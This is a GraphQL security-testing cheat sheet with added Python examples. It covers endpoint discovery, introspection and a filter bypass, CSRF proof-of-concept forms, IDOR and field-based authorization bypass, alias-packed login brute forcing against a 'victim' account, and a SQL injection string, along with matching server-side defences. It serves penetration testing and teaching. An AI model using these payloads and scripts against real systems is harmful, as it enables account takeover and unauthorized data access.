GraphQL_Security Testing

The document outlines various methods and techniques for testing the security of GraphQL endpoints, including identifying endpoints, using universal queries, and performing introspection. It also discusses potential vulnerabilities such as CSRF, IDORs, and injection attacks, along with strategies for bypassing authorization and rate limits. Additionally, it highlights the importance of understanding GraphQL schemas and the risks of information disclosure in GraphQL applications.

Uploaded by Arjun Arjun
GraphQL Security Testing
@h0tak88r

Finding GraphQL endpoints
  - Common paths to probe:
      /graphql
      /graphiql
      /graphql.php
      /graphql/console
      /api
      /api/graphql
      /graphql/api
      /graphql/graphql
  - Fingerprint: graphw00f - GraphQL Server Fingerprinting
  - Universal queries: if you send query{__typename} to any GraphQL endpoint, it will include the string {"data": {"__typename": "query"}} somewhere in its response (the value is the name of the root query type, "Query" in most schemas, so match on the __typename key rather than on exact case). This is known as a universal query, and is a useful tool in probing whether a URL corresponds to a GraphQL service.

GraphQL Schema
  - Introspection
      query={__schema{types{name,fields{name}}}}
      query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}
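The endpoint-discovery step above, as an added example (not code from the original page or its author): it joins the page's wordlist onto a base URL, sends the universal query as both a JSON POST and a GET, and classifies each response by the presence of the __typename key rather than by the exact value. The base URL https://target.example and the sample responses are constructed.

```python
"""Probe candidate URLs for a GraphQL endpoint with the universal query.

Added example, not from the original page. The path list is the page's
wordlist; the base URL and the sample responses are constructed.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

COMMON_PATHS = [
    "/graphql", "/graphiql", "/graphql.php", "/graphql/console",
    "/api", "/api/graphql", "/graphql/api", "/graphql/graphql",
]
UNIVERSAL_QUERY = "query{__typename}"


def candidate_urls(base):
    """Join the wordlist onto a base URL such as https://target.example."""
    return [base.rstrip("/") + p for p in COMMON_PATHS]


def classify_response(body):
    """Return 'confirmed', 'probable' or None for one response body.

    confirmed: data.__typename is present, i.e. the universal query was
    answered. Its value is the root query type's name ("Query" in most
    schemas, but any name is legal), so only the key is checked.
    probable: a GraphQL-shaped {"errors": [{"message": ...}]} envelope,
    e.g. a server that rejects GET or a missing Content-Type but still
    speaks GraphQL.
    """
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return None
    if not isinstance(doc, dict):
        return None
    data = doc.get("data")
    if isinstance(data, dict) and "__typename" in data:
        return "confirmed"
    errors = doc.get("errors")
    if isinstance(errors, list) and errors and all(
        isinstance(e, dict) and "message" in e for e in errors
    ):
        return "probable"
    return None


def probe_requests(url):
    """The two request shapes worth sending: a JSON POST and a plain GET."""
    post = urllib.request.Request(
        url,
        data=json.dumps({"query": UNIVERSAL_QUERY}).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    get = urllib.request.Request(
        url + "?" + urllib.parse.urlencode({"query": UNIVERSAL_QUERY}),
        method="GET",
    )
    return [post, get]


def probe(url, timeout=5):
    """Send both shapes and return the strongest verdict (needs network)."""
    best = None
    for req in probe_requests(url):
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            body = e.read().decode("utf-8", "replace")  # 4xx bodies are often still GraphQL-shaped
        except (urllib.error.URLError, OSError):
            continue
        verdict = classify_response(body)
        if verdict == "confirmed":
            return verdict
        best = best or verdict
    return best


if __name__ == "__main__":
    for url in candidate_urls("https://target.example"):  # constructed host
        print(url, probe(url))
```

A "probable" verdict (an errors envelope without data) is worth a second look with a different Content-Type or method, since many servers answer GET or form bodies with a GraphQL error rather than a 404.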

      Full Introspection Query
      If introspection is enabled but the above query doesn't run, try removing the onOperation, onFragment, and onField directives from the query structure. Many endpoints do not accept these directives as part of an introspection query, and you can often have more success with introspection by removing them.
  - Obtain the GraphQL API schema even if introspection is disabled, via errors (the field-name suggestions in "Did you mean ..." error messages leak valid names)
  - Detection and building of a GraphQL schema from proxy traffic
  - GraphQL Wordlist

  - GraphQL Without Introspection
      Inline introspection query
      Introspection query with newline: a special character after the __schema keyword may bypass a regex that excludes __schema, e.g.
        {"query": "query{__schema\n{queryType{name}}}"}
      Inspect/Sources/"Search all files": use the Sources tab of the developer tools to search all JS files to enumerate where the queries are saved, e.g.
        file:* mutation
        file:* query

Vulnerabilities
  - CSRF in GraphQL
      Content type changed from application/json -> x-www-form-urlencoded
      Change HTTP method: change the request method via Burp two times (POST -> GET -> POST, which re-encodes the JSON body as form parameters), then create the CSRF POC
      Try to send GET requests instead of POST ones to get CSRF
      Works when the endpoint accepts such requests and relies on session cookies alone (no CSRF token, no required custom header)
      For detailed research about this bug
  - IDORs: change the object reference (id, username, email, others) to another user's, e.g.
      {
        "operationName":"updateProfile",
        "variables":{"username":INJECT,"data":INJECT},
        "query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
      }
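The two request-shape tricks above (the newline after __schema against a regex blocklist, and CSRF by re-sending a JSON POST as GET or as x-www-form-urlencoded), as one added example that is not code from the original page or its author. The endpoint URL, the updateProfile mutation, the blocklist regex and the hardened pre-check are all constructed for illustration.

```python
"""Request variants for one GraphQL operation, a naive __schema filter that
the newline trick defeats, and a CSRF proof-of-concept form.

Added example, not from the original page. It covers two items above: the
introspection query with a newline after __schema, and CSRF by re-sending a
JSON POST as GET or as application/x-www-form-urlencoded. The endpoint URL,
the updateProfile mutation and the blocklist regex are constructed.
"""
import html
import json
import re
import urllib.parse

INTROSPECTION = "query{__schema{queryType{name}}}"


def newline_variant(query):
    """Put a line terminator after __schema; GraphQL lexers ignore it, so
    the server still runs the query."""
    return query.replace("__schema{", "__schema\n{")


def variants(query, operation_name=None, variables=None):
    """The same operation as JSON POST, as GET, and as a form POST.
    Each value is (method, content_type, body_or_query_string)."""
    params = {"query": query}
    if operation_name:
        params["operationName"] = operation_name
    if variables is not None:
        params["variables"] = json.dumps(variables)
    encoded = urllib.parse.urlencode(params)
    return {
        "json": ("POST", "application/json", json.dumps(params)),
        "get": ("GET", None, "?" + encoded),
        "form": ("POST", "application/x-www-form-urlencoded", encoded),
    }


# Naive blocklist of the kind the newline defeats: the literal token must be
# followed directly by a brace in the raw body.
NAIVE_BLOCK = re.compile(r"__schema\{")


def naive_filter_blocks(raw_body):
    return bool(NAIVE_BLOCK.search(raw_body))


# What a filter should do instead: tokenise names the way the GraphQL lexer
# does (whitespace, commas and line terminators are insignificant) and match
# the token. Coarse: it also sees names inside string literals, which only
# errs toward blocking.
NAME = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")


def lexer_filter_blocks(query):
    return "__schema" in NAME.findall(query)


def csrf_poc(endpoint, query, operation_name=None, variables=None):
    """Auto-submitting HTML form that delivers the form-encoded variant with
    the victim's cookies. Only lands if the server accepts form bodies and
    relies on cookies alone (no CSRF token, no required custom header)."""
    fields = {"query": query}
    if operation_name:
        fields["operationName"] = operation_name
    if variables is not None:
        fields["variables"] = json.dumps(variables)
    inputs = "\n".join(
        '  <input type="hidden" name="%s" value="%s">'
        % (html.escape(k), html.escape(v))
        for k, v in fields.items()
    )
    template = ('<form id="f" method="POST" action="%s">\n%s\n</form>\n'
                "<script>document.getElementById('f').submit();</script>")
    return template % (html.escape(endpoint), inputs)


def server_accepts(method, content_type, has_custom_header):
    """Pre-check for a hardened endpoint (constructed policy): mutations only
    over POST with a JSON body, which a cross-site form cannot send, plus a
    custom header such as X-Requested-With that a form cannot set."""
    return (method == "POST" and content_type == "application/json"
            and has_custom_header)
```

Run the raw body of each variant through the filter you are testing: the JSON body of the newline variant contains the two characters backslash and n between __schema and the brace, so a regex anchored on the literal sequence never fires, while the tokeniser-based check still catches the name.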

  - Bypass authorization in GraphQL
      Try to add more fields: when the request's query has just id and name, try adding fields like password, apikey, ................
      Try to add another operation/operationName alongside the old one to chain queries (batching)
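The introspection notes above and the "add more fields" item under Bypass authorization share one added example (not code from the original page or its author): it strips the onOperation/onFragment/onField tokens that some servers reject, flattens introspection type refs into GraphQL syntax, lists the root operations with their arguments, flags field names that look sensitive, and builds a full scalar selection for a type so the extra fields can be pasted into the app's own query. The schema is constructed to have the shape __schema returns; the sensitive-name pattern is an assumption, not a standard.

```python
"""Work with an introspection result: strip the directive fields that some
servers reject, list root operations with flattened types, and pick the
fields worth adding to a selection when probing authorization.

Added example, not from the original page. The schema is constructed to
look like a typical __schema result; SENSITIVE is an assumed heuristic.
"""
import re

# The full introspection query asks for onOperation, onFragment and onField
# on __Directive; some servers reject them, so drop just those tokens.
LEGACY_DIRECTIVE_FIELDS = re.compile(r"\s*\bon(?:Operation|Fragment|Field)\b")


def strip_legacy_directive_fields(query):
    return LEGACY_DIRECTIVE_FIELDS.sub("", query)


def type_ref(t):
    """Flatten an introspection type ref into syntax such as [User!]!"""
    if t is None:
        return "?"
    if t.get("kind") == "NON_NULL":
        return type_ref(t.get("ofType")) + "!"
    if t.get("kind") == "LIST":
        return "[" + type_ref(t.get("ofType")) + "]"
    return t.get("name") or "?"


def base_type(t):
    """Innermost type ref after unwrapping NON_NULL and LIST."""
    while t and t.get("kind") in ("NON_NULL", "LIST"):
        t = t.get("ofType")
    return t or {}


def operations(schema):
    """Map each root ('queryType', ...) to 'name(args): Type' strings."""
    types = {t["name"]: t for t in schema["types"]}
    out = {}
    for root in ("queryType", "mutationType", "subscriptionType"):
        ref = schema.get(root)
        if not ref:
            continue
        sigs = []
        for f in types.get(ref["name"], {}).get("fields") or []:
            args = ", ".join("%s: %s" % (a["name"], type_ref(a["type"]))
                             for a in f.get("args") or [])
            sigs.append("%s%s: %s" % (f["name"], "(%s)" % args if args else "",
                                      type_ref(f["type"])))
        out[root] = sigs
    return out


SENSITIVE = re.compile(r"password|passwd|secret|token|api_?key|ssn|private", re.I)


def sensitive_fields(schema):
    """(type, field, type ref) for object fields whose names suggest data a
    client should not normally be able to select."""
    hits = []
    for t in schema["types"]:
        if t.get("kind") != "OBJECT" or t["name"].startswith("__"):
            continue
        for f in t.get("fields") or []:
            if SENSITIVE.search(f["name"]):
                hits.append((t["name"], f["name"], type_ref(f["type"])))
    return hits


def scalar_selection(schema, type_name):
    """Every scalar/enum field of a type, ready to paste into a selection set
    when the app's own query only asks for id and name."""
    types = {t["name"]: t for t in schema["types"]}
    return " ".join(f["name"] for f in types.get(type_name, {}).get("fields") or []
                    if base_type(f["type"]).get("kind") in ("SCALAR", "ENUM"))


def _ref(kind, name, of=None):
    return {"kind": kind, "name": name, "ofType": of}


def _nn(inner):
    return _ref("NON_NULL", None, inner)


def _field(name, typ, args=()):
    return {"name": name, "args": list(args), "type": typ}


SAMPLE_SCHEMA = {  # constructed; the shape is what __schema returns
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            _field("user", _ref("OBJECT", "User"),
                   [{"name": "id", "type": _nn(_ref("SCALAR", "ID"))}]),
            _field("me", _ref("OBJECT", "User")),
        ]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            _field("updateProfile", _ref("OBJECT", "User"),
                   [{"name": "username", "type": _nn(_ref("SCALAR", "String"))},
                    {"name": "data", "type": _ref("INPUT_OBJECT", "ProfileInput")}]),
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            _field("id", _nn(_ref("SCALAR", "ID"))),
            _field("name", _ref("SCALAR", "String")),
            _field("email", _ref("SCALAR", "String")),
            _field("passwordHash", _ref("SCALAR", "String")),
            _field("apiKey", _ref("SCALAR", "String")),
            _field("friends", _nn(_ref("LIST", None, _nn(_ref("OBJECT", "User"))))),
        ]},
        {"kind": "SCALAR", "name": "ID"},
        {"kind": "SCALAR", "name": "String"},
    ],
}
```

With a real introspection result, pass `json.loads(body)["data"]["__schema"]` where SAMPLE_SCHEMA is used; the authorization test is then to request `scalar_selection(schema, "User")` in place of the app's `id name` selection and see which of the flagged fields the server returns without an ownership check.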

  - Rate limit bypass using aliases (many aliased copies of the same field run in one HTTP request)
  - Denial of service (e.g. deeply nested or heavily aliased queries)
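The alias-based rate-limit bypass above, as an added example that is not code from the original page or its author: one mutation carries N aliased login attempts, the response is mapped back to the candidate that succeeded, and the server-side counter shows the fix (count root fields before executing and rate-limit per field, not per request). The login field, its argument names, the password list and the sample response are constructed.

```python
"""Pack many attempts of one operation into a single HTTP request with
aliases, and the server-side counter that closes the hole.

Added example, not from the original page. The login mutation, its field
and argument names, the password list and the sample response are all
constructed for illustration.
"""
import json


def aliased_batch(operation, candidates, selection="{ token }", prefix="a"):
    """Build one mutation whose root fields are aliased copies of
    `operation`, with each candidate substituted for the %s placeholder.
    A per-request rate limit sees one request; the resolver runs N logins."""
    fields = [
        "%s%d: %s %s" % (prefix, i, operation % json.dumps(cand), selection)
        for i, cand in enumerate(candidates)
    ]
    return "mutation {\n  " + "\n  ".join(fields) + "\n}"


def successful_aliases(response, candidates, prefix="a"):
    """Map aliases in the response back to the candidates whose resolver
    returned data (failed attempts come back null with an errors entry)."""
    data = response.get("data") or {}
    return [cand for i, cand in enumerate(candidates)
            if data.get("%s%d" % (prefix, i)) is not None]


def count_root_fields(query):
    """Count selections at depth 1 of the operation, i.e. the fields the
    server will actually resolve. Skips string literals and argument lists
    and does not count an alias name, only the field it points at."""
    depth = paren = count = i = 0
    in_str = False
    n = len(query)
    while i < n:
        c = query[i]
        if in_str:
            if c == "\\":
                i += 1            # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c == "(":
            paren += 1
        elif c == ")":
            paren -= 1
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
        elif depth == 1 and paren == 0 and (c == "_" or c.isalpha()):
            j = i
            while j < n and (query[j] == "_" or query[j].isalnum()):
                j += 1
            k = j
            while k < n and query[k] in " \t\r\n,":
                k += 1
            if k < n and query[k] == ":":
                i = k + 1         # this name was an alias; the field follows
                continue
            count += 1
            i = j
            continue
        i += 1
    return count


def within_alias_limit(query, max_root_fields=10):
    """Reject before execution when a request carries more root fields than
    the per-request budget (constructed policy); charge the rate limit per
    counted field rather than per HTTP request."""
    return count_root_fields(query) <= max_root_fields


if __name__ == "__main__":
    passwords = ["123456", "password", "hunter2"]  # constructed list
    q = aliased_batch('login(username: "victim", password: %s)', passwords)
    print(q)
    print("root fields:", count_root_fields(q))
```

The same counter is the first line of defence against the aliasing and batching DoS listed next to this item: a query with thousands of root fields is rejected before any resolver runs.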

  - Injection Attacks
      SQLi, e.g. password: "password' or 1=1 -- -"
      XSS
  - Information disclosure
      Team object in GraphQL disclosed the total number of whitelisted hackers
      Team object exposes the amount of participants in a private program to non-invited users